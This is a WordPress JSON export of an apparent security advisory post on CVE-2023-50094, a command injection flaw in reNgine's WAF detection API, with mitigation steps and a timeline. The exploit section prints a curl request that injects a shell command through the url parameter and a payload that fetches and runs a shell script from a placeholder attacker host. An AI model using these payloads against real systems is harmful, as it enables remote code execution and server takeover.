{"id":18366,"date":"2025-04-06T05:07:59","date_gmt":"2025-04-06T05:07:59","guid":{"rendered":""},"modified":"2025-09-16T12:32:08","modified_gmt":"2025-09-16T18:32:08","slug":"cve-2023-50094-authenticated-command-injection-vulnerability-in-rengine","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2023-50094-authenticated-command-injection-vulnerability-in-rengine\/","title":{"rendered":"CVE-2023-50094: Authenticated Command Injection Vulnerability in reNgine"},"content":{"rendered":"<h2 class=\"\" data-start=\"198\" data-end=\"209\">Overview<\/h2>\n<p class=\"\" data-start=\"211\" data-end=\"575\">CVE-2023-50094 is a critical authenticated command injection vulnerability discovered in reNgine, an automated reconnaissance framework widely used by penetration testers and bug bounty hunters. This flaw allows authenticated users to execute arbitrary shell commands on the reNgine host, leading to full system compromise in vulnerable configurations.<\/p>\n<p class=\"\" data-start=\"577\" data-end=\"824\">Due to the nature of reNgine as a network-facing recon tool with command-line integration, exploitation of this vulnerability could provide attackers with persistent shell access, privilege escalation pathways, and data exfiltration opportunities.<\/p>\n<h2 class=\"\" data-start=\"831\" data-end=\"855\">Vulnerability Summary<\/h2>\n<div class=\"group pointer-events-none relative flex justify-center *:pointer-events-auto\">\n<div class=\"tableContainer horzScrollShadows relative\">\n<table class=\"min-w-full\" data-start=\"857\" data-end=\"1511\">\n<thead data-start=\"857\" data-end=\"929\">\n<tr data-start=\"857\" data-end=\"929\">\n<th data-start=\"857\" data-end=\"882\">Field<\/th>\n<th data-start=\"882\" data-end=\"929\">Detail<\/th>\n<\/tr>\n<\/thead>\n<tbody data-start=\"1003\" data-end=\"1511\">\n<tr data-start=\"1003\" data-end=\"1075\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1003\" data-end=\"1028\"><strong data-start=\"1005\" data-end=\"1015\">CVE ID<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1028\" data-end=\"1075\">CVE-2023-50094<\/td>\n<\/tr>\n<tr data-start=\"1076\" data-end=\"1148\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1076\" data-end=\"1101\"><strong data-start=\"1078\" data-end=\"1090\">Severity<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1101\" data-end=\"1148\">Critical (CVSS Score: 8.8)<\/td>\n<\/tr>\n<tr data-start=\"1149\" data-end=\"1221\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1149\" data-end=\"1174\"><strong data-start=\"1151\" data-end=\"1168\">Attack Vector<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1174\" data-end=\"1221\">Network<\/td>\n<\/tr>\n<tr data-start=\"1222\" data-end=\"1293\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1222\" data-end=\"1247\"><strong data-start=\"1224\" data-end=\"1247\">Privileges Required<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1247\" data-end=\"1293\">Low (<a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-5821-critical-authentication-bypass-vulnerability-in-case-theme-user-plugin-for-wordpress\/\"  data-wpil-monitor-id=\"83288\">Authenticated User<\/a>)<\/td>\n<\/tr>\n<tr data-start=\"1294\" data-end=\"1366\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1294\" data-end=\"1319\"><strong data-start=\"1296\" data-end=\"1316\">User Interaction<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1319\" data-end=\"1366\">None<\/td>\n<\/tr>\n<tr data-start=\"1367\" data-end=\"1439\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1367\" data-end=\"1392\"><strong data-start=\"1369\" data-end=\"1379\">Impact<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1392\" data-end=\"1439\"><a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-45199-remote-code-execution-vulnerability-in-insightsoftware-hive-jdbc\/\"  data-wpil-monitor-id=\"29920\">Remote Code Execution<\/a> (RCE)<\/td>\n<\/tr>\n<tr data-start=\"1440\" data-end=\"1511\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1440\" data-end=\"1465\"><strong data-start=\"1442\" data-end=\"1463\">Affected Endpoint<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1465\" data-end=\"1511\"><code class=\"\" data-line=\"\">\/api\/tools\/waf_detector\/<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<h2 class=\"\" data-start=\"1518\" data-end=\"1538\">Affected Products<\/h2>\n<div class=\"group pointer-events-none relative flex justify-center *:pointer-events-auto\">\n<div class=\"tableContainer horzScrollShadows relative\">\n<table class=\"min-w-full\" data-start=\"1540\" data-end=\"1649\">\n<thead data-start=\"1540\" data-end=\"1575\">\n<tr data-start=\"1540\" data-end=\"1575\">\n<th data-start=\"1540\" data-end=\"1550\">Product<\/th>\n<th data-start=\"1550\" data-end=\"1575\">Affected Versions<\/th>\n<\/tr>\n<\/thead>\n<tbody data-start=\"1613\" data-end=\"1649\">\n<tr data-start=\"1613\" data-end=\"1649\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1613\" data-end=\"1623\">reNgine<\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1623\" data-end=\"1649\">v1.2.0 to v2.0.2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<h2 class=\"\" data-start=\"1656\" data-end=\"1680\">How the Exploit Works<\/h2>\n<p class=\"\" data-start=\"1682\" data-end=\"1902\">The <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-2905-critical-xxe-vulnerability-in-wso2-api-manager-gateway\/\"  data-wpil-monitor-id=\"43110\">vulnerability is located in the WAF detection API<\/a> route (<code class=\"\" data-line=\"\">\/api\/tools\/waf_detector\/<\/code>) where the <code class=\"\" data-line=\"\">url<\/code> parameter is directly interpolated into a shell command using Python\u2019s <code class=\"\" data-line=\"\">subprocess.check_output<\/code> with <code class=\"\" data-line=\"\">shell=True<\/code>.<\/p>\n<p class=\"\" data-start=\"1904\" data-end=\"2154\">Because the input is not sanitized, attackers can <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-25053-os-command-injection-vulnerability-in-wi-fi-ap-unit-ac-wps-11ac-series\/\"  data-wpil-monitor-id=\"31375\">inject arbitrary commands<\/a> using shell metacharacters like <code class=\"\" data-line=\"\">;<\/code>, <code class=\"\" data-line=\"\">&amp;&amp;<\/code>, or <code class=\"\" data-line=\"\">|<\/code>. If the application is running with elevated privileges (e.g., as root inside Docker), this can <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-3328-buffer-overflow-vulnerability-in-tenda-ac1206-could-lead-to-system-compromise\/\"  data-wpil-monitor-id=\"29857\">lead to full system<\/a> control.<\/p>\n<h2 class=\"\" data-start=\"2161\" data-end=\"2190\">Conceptual Exploit Example<\/h2>\n<p class=\"\" data-start=\"2192\" data-end=\"2274\">Here is a conceptual example demonstrating how an <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-3200-unauthenticated-remote-attacker-exploiting-insecure-tls-protocols\/\"  data-wpil-monitor-id=\"41542\">attacker could exploit<\/a> the flaw:<\/p><div id=\"ameeb-2345225738\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<div class=\"contain-inline-size rounded-md border-[0.5px] border-token-border-medium relative bg-token-sidebar-surface-primary\">\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"\" data-line=\"\">curl -k &lt;span class=&quot;hljs-string&quot;&gt;&#039;https:\/\/target-host\/api\/tools\/waf_detector\/?format=json&amp;url=;id&#039;&lt;\/span&gt; \\<br \/>\n  -H &lt;span class=&quot;hljs-string&quot;&gt;&#039;Cookie: sessionid=VALID_SESSION_ID&#039;&lt;\/span&gt;<br \/>\n<\/code><\/div>\n<\/div>\n<p class=\"\" data-start=\"2407\" data-end=\"2562\">In this example, the <\/code><a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-32931-critical-os-command-injection-vulnerability-in-devdojo-voyager\/\"  data-wpil-monitor-id=\"33560\">command <code class=\"\" data-line=\"\">id is injected&lt;\/a&gt; via the &lt;code data-start=&quot;2461&quot; data-end=&quot;2466&quot;&gt;url<\/code> parameter and executed on the server. An attacker could replace this with any payload, such as:<\/p>\n<div class=\"contain-inline-size rounded-md border-[0.5px] border-token-border-medium relative bg-token-sidebar-surface-primary\">\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"\" data-line=\"\">;curl http:\/\/attacker.com\/shell.sh|bash<br \/>\n<\/code><\/div>\n<\/div>\n<p class=\"\" data-start=\"2617\" data-end=\"2671\">Resulting in full remote <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-41788-critical-code-execution-vulnerability-in-sentron-7kt-pac1260-data-manager\/\"  data-wpil-monitor-id=\"30695\">code execution<\/a> on the server.<\/p>\n<h2 class=\"\" data-start=\"2678\" data-end=\"2711\">Recommendations for Mitigation<\/h2>\n<p class=\"\" data-start=\"2713\" data-end=\"2766\">To mitigate the risks associated with CVE-2023-50094:<\/p>\n<ul data-start=\"2768\" data-end=\"3483\">\n<li class=\"\" data-start=\"2768\" data-end=\"2913\">\n<p class=\"\" data-start=\"2770\" data-end=\"2913\">Update reNgine Immediately<br data-start=\"2800\" data-end=\"2803\" \/>Upgrade to version 2.1.2 or later, which properly <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-31234-input-sanitization-flaw-leading-to-system-termination-and-kernel-memory-corruption\/\"  data-wpil-monitor-id=\"83289\">sanitizes inputs<\/a> and removes unsafe shell invocations.<\/p>\n<\/li>\n<li class=\"\" data-start=\"2915\" data-end=\"3030\">\n<p class=\"\" data-start=\"2917\" data-end=\"3030\">Restrict <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-45616-incorrect-access-control-vulnerability-in-the-admin-api-of-brcc-v1-2-0\/\"  data-wpil-monitor-id=\"43324\">API Access<\/a><br data-start=\"2940\" data-end=\"2943\" \/>Limit access to reNgine\u2019s API endpoints via IP whitelisting, <a class=\"wpil_keyword_link\" href=\"https:\/\/ameeba.com\"   title=\"VPN\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"29354\">VPN<\/a>, or reverse proxies.<\/p>\n<\/li>\n<li class=\"\" data-start=\"3032\" data-end=\"3199\">\n<p class=\"\" data-start=\"3034\" data-end=\"3199\">Run with Least Privilege<br data-start=\"3062\" data-end=\"3065\" \/>Ensure the reNgine process does not run with <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-30389-unauthorized-privilege-elevation-in-azure-bot-framework-sdk\/\"  data-wpil-monitor-id=\"42397\">elevated privileges<\/a>. Consider <a class=\"wpil_keyword_link\" href=\"https:\/\/www.ameeba.com\"   title=\"sandboxing\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"29355\">sandboxing<\/a> it with Docker or similar container isolation.<\/p>\n<\/li>\n<li class=\"\" data-start=\"3201\" data-end=\"3300\">\n<p class=\"\" data-start=\"3203\" data-end=\"3300\">Audit User Roles<br data-start=\"3223\" data-end=\"3226\" \/>Reassess access permissions for users of the reNgine <a class=\"wpil_keyword_link\" href=\"https:\/\/chat.ameeba.com\"   title=\"interface\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"29356\">interface<\/a> and APIs.<\/p>\n<\/li>\n<li class=\"\" data-start=\"3302\" data-end=\"3483\">\n<p class=\"\" data-start=\"3304\" data-end=\"3483\">Sanitize User Input<br data-start=\"3327\" data-end=\"3330\" \/>Never pass user-controlled input to <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-11861-critical-command-injection-vulnerability-in-enersys-ampa-granting-privileged-remote-shell-access\/\"  data-wpil-monitor-id=\"45218\">shell commands<\/a>. Use safe <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-34087-code-execution-vulnerability-in-gtkwave-3-3-115-through-improper-array-index-validation\/\"  data-wpil-monitor-id=\"41541\">execution patterns such as argument arrays<\/a> with <code class=\"\" data-line=\"\">subprocess.run()<\/code> (without <code class=\"\" data-line=\"\">shell=True<\/code>).<\/p>\n<\/li>\n<\/ul>\n<h2 class=\"\" data-start=\"3490\" data-end=\"3514\">Timeline and Response<\/h2>\n<ul data-start=\"3516\" data-end=\"3657\">\n<li class=\"\" data-start=\"3516\" data-end=\"3543\">\n<p class=\"\" data-start=\"3518\" data-end=\"3543\">Reported: July 2024<\/p>\n<\/li>\n<li class=\"\" data-start=\"3544\" data-end=\"3574\">\n<p class=\"\" data-start=\"3546\" data-end=\"3574\">Patched: July 23, 2024<\/p>\n<\/li>\n<li class=\"\" data-start=\"3575\" data-end=\"3607\">\n<p class=\"\" data-start=\"3577\" data-end=\"3607\">Fixed In: reNgine v2.1.2<\/p>\n<\/li>\n<li class=\"\" data-start=\"3608\" data-end=\"3657\">\n<p class=\"\" data-start=\"3610\" data-end=\"3657\">Disclosed By: GitHub Security Advisory Team<\/p>\n<\/li>\n<\/ul>\n<h2 class=\"\" data-start=\"3664\" data-end=\"3683\">Closing Thoughts<\/h2>\n<p class=\"\" data-start=\"3685\" data-end=\"3959\">CVE-2023-50094 reinforces the importance of never trusting user input, especially when invoking system-level operations in web-based automation tools. In highly extensible systems like reNgine, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-6634-command-injection-vulnerability-in-learnpress-wordpress-plugin\/\"  data-wpil-monitor-id=\"34517\">command injection<\/a> flaws can turn into full takeover vectors if left unaddressed.<\/p>\n<p class=\"\" data-start=\"3961\" data-end=\"4133\">Users and organizations relying on <a href=\"https:\/\/www.ameeba.com\/blog\/fortinet-s-fortigate-vulnerability-ssl-vpn-symlink-exploit-puts-user-access-at-risk-post-patching\/\"  data-wpil-monitor-id=\"30038\">reNgine<\/a> should patch immediately and audit all instances to prevent unauthorized access or persistence from previously exploited systems.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview CVE-2023-50094 is a critical authenticated command injection vulnerability discovered in reNgine, an automated reconnaissance framework widely used by penetration testers and bug bounty hunters. This flaw allows authenticated users to execute arbitrary shell commands on the reNgine host, leading to full system compromise in vulnerable configurations. Due to the nature of reNgine as a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[92,79],"product":[],"attack_vector":[78,76,80],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-18366","post","type-post","status-publish","format-standard","hentry","category-uncategorized","vendor-docker","vendor-github","attack_vector-injection","attack_vector-privilege-escalation","attack_vector-rce"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/18366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=18366"}],"version-history":[{"count":28,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/18366\/revisions"}],"predecessor-version":[{"id":75830,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/18366\/revisions\/75830"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=18366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=18366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=18366"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=18366"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=18366"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=18366"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=18366"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=18366"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=18366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}